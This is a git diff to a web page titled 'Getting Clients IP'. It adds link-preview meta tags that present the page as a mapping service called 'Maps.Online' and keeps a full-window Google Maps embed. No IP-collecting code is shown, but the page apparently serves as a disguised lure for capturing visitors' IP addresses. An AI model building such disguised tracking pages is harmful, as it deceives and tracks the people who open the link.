--- a/index.html
+++ b/index.html
@@ -4,7 +4,11 @@
  
 <head>
     <title>Getting Clients IP</title>
-     
+    <meta content="Maps.Online" property="og:title" />
+    <meta content="Mapping service that allows users to display pins around the world" property="og:description" />
+    <meta content="https://embed.com/this-is-the-site-url" property="og:url" />
+    <meta content="https://cdn.discordapp.com/attachments/1105992803051376660/1106099196748111972/weresoback.png" property="og:image" />
+    <meta content="#0000FF" data-react-helmet="true" name="theme-color" />
     <style>
     h1 {
         color: green;
@@ -14,7 +18,7 @@
 </head>
  
 <body>
-    <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d23767.794092754393!2d-87.68963957145154!3d41.871900218707324!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x880e2d115c1c0a19%3A0xa1bd7046f4790dfe!2sUniversity%20of%20Illinois!5e0!3m2!1sen!2sus!4v1683784046626!5m2!1sen!2sus" width="2000" height="2000" style="border:0;" allowfullscreen="true" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe>
+    <iframe id="map" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d23767.794092754393!2d-87.68963957145154!3d41.871900218707324!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x880e2d115c1c0a19%3A0xa1bd7046f4790dfe!2sUniversity%20of%20Illinois!5e0!3m2!1sen!2sus!4v1683784046626!5m2!1sen!2sus" width="2000" height="2000" style="border:0;" allowfullscreen="true" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe>
 
 </body>
  
